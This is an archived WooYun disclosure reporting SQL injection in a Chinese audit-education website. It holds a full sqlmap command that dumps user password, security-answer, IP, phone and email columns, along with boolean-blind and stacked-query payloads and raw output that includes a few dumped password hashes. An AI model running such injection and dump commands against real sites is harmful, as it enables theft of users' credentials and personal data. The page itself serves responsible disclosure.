当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153888

漏洞标题:中国审计教育网某处存在SQL注射漏洞(19万系统信息泄露+6千多用户密码,登陆IP,手机号码及邮箱地址泄露)

相关厂商:中国审计教育网

漏洞作者: 路人甲

提交时间:2015-11-23 18:30

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

中国审计教育网由国内长期从事审计理论研究、审计教育工作的专家、学者和审计实务工作者于2003年6月共同投资兴建。从开办至今,中国
审计教育网一直致力于以推动中国审计教育发展,培育中国审计精英为己任。经过近4年多的努力,现中国审计教育网已成为以整合、开发与
共享审计教育与培训资源为特色,集审计教育与培训、审计理论研究与软件开发、审计国际交流与合作等功能为一体,专业化、高品质、国际
化、一流的审计教育与培训平台。
中国审计教育网作为中国审计行业最大的信息提供商,网站内容涵盖国家审计、社会审计、独立审计、ACCA培训、CISA培训、CIA培训 、CPA
培训、金融审计、管理审计、计算机审计等方面的信息,并以及时全面的审计培训信息和丰富实用的免费审计资源赢得了广大审计专家和工作
者的一致好评,并与审计署、南京审计学院、国内大型审计培训机构以及国内知名会计师事务所建立了良好的合作关系,形成了具有审计专业
特色的行业网站,在审计行业网站中名列前茅。

详细说明:

地址:http://**.**.**.**/fagui_cont.asp?news_id=15711

python sqlmap.py -u "http://**.**.**.**/fagui_cont.asp?news_id=15711" -p news_id --technique=BS --random-agent --batch -D new_shenji -T dbo.Dv_User -C TruePassWord,UserAnswer,UserLastIP,UserName,UserPassword,UserMobile,UserEmail --dump --threads=10 --start 1 --stop 3


Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 97526   |
| sys.sysmessages                                  | 97526   |


| dbo.Dv_User                                      | 6423    |

漏洞证明:

---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user:    '**.**.**.**'
current user is DBA:    False
database management system users [2]:
[*] sa
[*] **.**.**.**
Database: new_shenji
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.newstable                                    | 121526  |
| dbo.zhaopin                                      | 10866   |
| dbo.neixun_fk                                    | 9748    |
| dbo.Dv_Message                                   | 7599    |
| dbo.Dv_User                                      | 6423    |
| dbo.A_info                                       | 3106    |
| dbo.link                                         | 3062    |
| dbo.products                                     | 2044    |
| dbo.A_comments                                   | 2019    |
| dbo.j_mail                                       | 1509    |
| dbo.baoming                                      | 1042    |
| dbo.v_user                                       | 970     |
| dbo.qiuzhi                                       | 361     |
| dbo.Dv_Log                                       | 334     |
| dbo.Dv_bbs1                                      | 203     |
| dbo.Dv_Topic                                     | 195     |
| dbo.gcinfo                                       | 133     |
| dbo.type                                         | 131     |
| dbo.ks_info                                      | 107     |
| dbo.gongkai                                      | 96      |
| dbo.links                                        | 91      |
| dbo.orderDetail                                  | 64      |
| dbo.neixun                                       | 58      |
| dbo.zjinfo                                       | 47      |
| dbo.shenqing                                     | 29      |
| dbo.Dv_Board                                     | 26      |
| dbo.orders                                       | 26      |
| dbo.Dv_UserGroups                                | 25      |
| dbo.hangye                                       | 25      |
| dbo.v_info                                       | 23      |
| dbo.Dv_Help                                      | 21      |
| dbo.certificate                                  | 18      |
| dbo.zhuanjia                                     | 18      |
| dbo.about                                        | 17      |
| dbo.Dv_SmallPaper                                | 17      |
| dbo.gg                                           | 15      |
| dbo.A_category                                   | 12      |
| dbo.user_type                                    | 11      |
| dbo.x_fankui                                     | 11      |
| dbo.anli                                         | 8       |
| dbo.gaoceng                                      | 8       |
| dbo.lunwen                                       | 8       |
| dbo.protype                                      | 7       |
| dbo.web_fk                                       | 7       |
| dbo.Dv_AdCode                                    | 6       |
| dbo.guestbook                                    | 6       |
| dbo.Manage_User                                  | 6       |
| dbo.v_order                                      | 6       |
| dbo.zhiming                                      | 6       |
| dbo.peixun                                       | 5       |
| dbo.v_category                                   | 5       |
| dbo.Dv_Upfile                                    | 4       |
| dbo.client                                       | 3       |
| dbo.Dv_Admin                                     | 3       |
| dbo.Dv_BbsLink                                   | 2       |
| dbo.Dv_BbsNews                                   | 2       |
| dbo.Dv_Online                                    | 2       |
| dbo.vote                                         | 2       |
| dbo.Dv_ChallengeInfo                             | 1       |
| dbo.Dv_notdownload                               | 1       |
| dbo.Dv_Setup                                     | 1       |
| dbo.Dv_Style                                     | 1       |
| dbo.Dv_StyleHelp                                 | 1       |
| dbo.Dv_TableList                                 | 1       |
| dbo.Dv_Vote                                      | 1       |
| dbo.tanchu                                       | 1       |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 97526   |
| sys.sysmessages                                  | 97526   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 11949   |
| sys.all_parameters                               | 7088    |
| sys.system_parameters                            | 7088    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 4655    |
| sys.system_columns                               | 4611    |
| sys.trace_event_bindings                         | 4304    |
| sys.syscomments                                  | 2990    |
| dbo.spt_values                                   | 2506    |
| sys.all_objects                                  | 1931    |
| sys.sysobjects                                   | 1931    |
| sys.system_objects                               | 1925    |
| sys.database_permissions                         | 1841    |
| sys.syspermissions                               | 1841    |
| sys.sysprotects                                  | 1840    |
| sys.all_sql_modules                              | 1781    |
| sys.system_sql_modules                           | 1781    |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.event_notification_event_types               | 364     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.trigger_event_types                          | 244     |
| sys.trace_events                                 | 180     |
| sys.allocation_units                             | 130     |
| sys.partitions                                   | 118     |
| sys.xml_schema_facets                            | 112     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 93      |
| sys.dm_audit_class_type_map                      | 82      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 68      |
| sys.sysconfigures                                | 68      |
| sys.syscurconfigs                                | 68      |
| sys.trace_columns                                | 66      |
| sys.fulltext_document_types                      | 50      |
| sys.fulltext_languages                           | 48      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.securable_classes                            | 22      |
| sys.trace_categories                             | 21      |
| sys.database_mirroring                           | 19      |
| sys.database_recovery_status                     | 19      |
| sys.databases                                    | 19      |
| sys.syscursorcolumns                             | 19      |
| sys.sysdatabases                                 | 19      |
| sys.xml_schema_component_placements              | 18      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.schemas                                      | 15      |
| sys.xml_schema_attributes                        | 15      |
| sys.database_principals                          | 14      |
| sys.sysusers                                     | 14      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.assembly_types                               | 3       |
| sys.service_queue_usages                         | 3       |
| sys.stats                                        | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.syscursorrefs                                | 1       |
| sys.syscursors                                   | 1       |
| sys.syscursortables                              | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 1974    |
| dbo.backupset                                    | 987     |
| dbo.backupmediafamily                            | 986     |
| dbo.backupmediaset                               | 986     |
| dbo.restorefile                                  | 26      |
| dbo.restorefilegroup                             | 13      |
| dbo.restorehistory                               | 13      |
| dbo.syspolicy_configuration                      | 4       |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: new_shenji
Table: newstable
[19 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| news_audit        | int           |
| news_author       | nvarchar      |
| news_category1    | int           |
| news_category2    | int           |
| news_category3    | nvarchar      |
| news_comment_bad  | int           |
| news_comment_good | int           |
| news_cont         | ntext         |
| news_date         | smalldatetime |
| news_editor       | char          |
| news_hit          | int           |
| news_id           | int           |
| news_paper        | char          |
| news_picurl       | nvarchar      |
| news_public       | int           |
| news_source       | nvarchar      |
| news_title        | nvarchar      |
| news_top          | int           |
| news_zhuanzhu     | ntext         |
+-------------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: new_shenji
Table: Dv_User
[70 columns]
+---------------------+---------------+
| Column              | Type          |
+---------------------+---------------+
| IsChallenge         | tinyint       |
| JoinDate            | smalldatetime |
| LastLogin           | smalldatetime |
| LockUser            | tinyint       |
| TitlePic            | nvarchar      |
| TruePassWord        | nvarchar      |
| UserAnswer          | nvarchar      |
| UserAudit           | int           |
| UserAvaSetting      | ntext         |
| UserBirthday        | nvarchar      |
| UserCertificate     | nvarchar      |
| UserCity            | nvarchar      |
| UserClass           | nvarchar      |
| UserCompany         | nvarchar      |
| UserCompanyAddress  | nvarchar      |
| UserCompanyCategory | nvarchar      |
| UserCompanyIntro    | ntext         |
| UserContactor       | char          |
| UserContactorMsn    | nvarchar      |
| UserContactorQQ     | nvarchar      |
| userCP              | int           |
| UserDataBase        | int           |
| UserDel             | int           |
| UserEducation       | char          |
| UserEmail           | nvarchar      |
| userEP              | int           |
| UserExperience      | char          |
| UserFace            | nvarchar      |
| UserFav             | nvarchar      |
| userfax             | nvarchar      |
| userflag            | int           |
| UserGroup           | nvarchar      |
| UserGroupID         | int           |
| UserHeight          | int           |
| UserHidden          | tinyint       |
| UserID              | int           |
| UserIM              | ntext         |
| UserInfo            | ntext         |
| UserIsAva           | tinyint       |
| UserIsBest          | int           |
| UserJiFen           | int           |
| UserJoinDate        | smalldatetime |
| UserLastIP          | nvarchar      |
| UserLastLogin       | smalldatetime |
| userlevel           | char          |
| UserLogins          | int           |
| UserManager         | char          |
| UserMobile          | nvarchar      |
| usermobiletel       | nvarchar      |
| UserMsg             | nvarchar      |
| UserName            | nvarchar      |
| UserPassword        | nvarchar      |
| UserPhoto           | nvarchar      |
| UserPost            | int           |
| UserPower           | int           |
| userprofessinol     | char          |
| UserProvince        | nvarchar      |
| UserQuesion         | nvarchar      |
| userrealname        | char          |
| UserSetting         | nvarchar      |
| UserSex             | tinyint       |
| UserSign            | nvarchar      |
| usertel             | nvarchar      |
| UserTitle           | nvarchar      |
| UserToday           | nvarchar      |
| UserTopic           | int           |
| UserViews           | int           |
| userWealth          | int           |
| UserWebSite         | nvarchar      |
| UserWidth           | int           |
+---------------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=15711 AND 3547=3547
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: news_id=15711;WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: new_shenji
Table: Dv_User
[3 entries]
+------------------+------------------+-----------------+----------+------------------+------------+--------------------+
| TruePassWord     | UserAnswer       | UserLastIP      | UserName | UserPassword     | UserMobile | UserEmail          |
+------------------+------------------+-----------------+----------+------------------+------------+--------------------+
| r84y6115O3q4tQFJ | 8e2178fd2b5a96b1 | **.**.**.**   | 0000     | 8ad9902aecba32e2 | NULL       | schbj@**.**.**.**      |
| 4O263V7IhC324jxc | 8ad9902aecba32e2 | **.**.**.**     | 0000000  | 8ad9902aecba32e2 | NULL       | asdf@**.**.**.**        |
| CgWJAnL9970wE057 | 7bb52e4599f2886c | **.**.**.** | 0002338  | f2d382aba5d6e6ad | NULL       | fmnyvx@**.**.**.** |
+------------------+------------------+-----------------+----------+------------------+------------+--------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-27 11:18

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价